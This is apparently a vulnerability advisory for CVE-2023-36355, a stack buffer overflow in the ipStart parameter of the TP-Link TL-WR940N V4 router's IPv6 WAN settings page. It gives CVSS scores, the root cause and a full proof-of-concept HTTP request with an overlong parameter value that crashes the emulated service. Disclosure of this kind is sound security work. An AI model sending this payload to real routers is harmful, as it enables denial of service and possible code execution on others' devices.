CVE-2023-36355: iotvul/tp-link/9/TP-Link TL-WR940N wireless router userRpmWanDynamicIpV6CfgRpm buffer write out-of-bounds vulnerability.md at main · a101e-IoTvul/iotvul

TP-Link TL-WR940N wireless router /userRpm/WanDynamicIpV6CfgRpm buffer write out-of-bounds vulnerability****1 Basic Information

• Vulnerability Type: Buffer write out-of-bounds
• Vulnerability Description: A buffer write-out vulnerability exists in TP-Link TL-WR940N wireless router, firmware version V4. Its /userRpm/WanDynamicIpV6CfgRpm implementation has a security vulnerability in handling the ipStart GET key parameter, allowing remote attackers to submit special requests that can cause buffer out-of-bounds write errors, which may lead to memory-sensitive information leakage and denial of service.
• Device model:
  • TP-Link TL-WR940N V4

2 Vulnerability Value

• Maturity of Public Information: None

• Order of Public Vulnerability Analysis Report: None

• Stable reproducibility: yes

• Vulnerability Score (refer to CVSS)

  • V2：8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C
  • V3.1：9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

• Exploit Conditions

  • Attack Vector Type: Network
  • Attack Complexity: Low
  • Complexity of Exploit
    • Permission Constraints: authentication is required
    • User Interaction: No victim interaction required
  • Scope of Impact: Changed (may affect other components than vulnerable ones)
  • Impact Indicators:
    • Confidentiality: High
    • Integrity: High
    • Availability: High
  • Stability of vulnerability exploitation: Stable recurrence
  • Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory

• Exploit Effect

  • Denial of Service
  • Remote Code Execution(RCE)

3 PoC

The PoC of TP-Link TL-WR940N is as follows:

GET /RKIMKONAENVJOZYB/userRpm/WanDynamicIpV6CfgRpm.htm?ipv6Enable=on&wantype=2&ipType=2&mtu=1480&dnsType=0&ipAssignType=0&ipStart=1000aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ipEnd=2000&time=86400&ipPrefixType=0&staticPrefix=&staticPrefixLength=64&Save=Save HTTP/1.1 Host: 127.0.0.1:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://127.0.0.1:8081/RKIMKONAENVJOZYB/userRpm/WanDynamicIpV6CfgRpm.htm Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D Upgrade-Insecure-Requests: 1

4 Vulnerability Principle

When the Web management component receives a GET request, its /userRpm/WanDynamicIpV6CfgRpm component implements a security vulnerability in processing the ipStart GET key parameter. The length of the parameter key of ipStart can be any length and it is put into the stack without any boundary check, resulting in a write out-of-bounds. An attacker can exploit this vulnerability to overwrite the return address, which may lead to the disclosure of memory-sensitive information and denial of service.

The firmware is simulated by means of simulation, the simulation process and interface are as follows:

After sending the PoC, the ipStart parameter value is too long, which leads to the write out of bounds, causing a fatal memory error, and a BadVA error, which leads to the service crash.

5. The basis for judging as a 0-day vulnerability

Search the WanDynamicIpV6CfgRpm keyword in the NVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).

Search the WanDynamicIpV6CfgRpm keyword in the CNVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).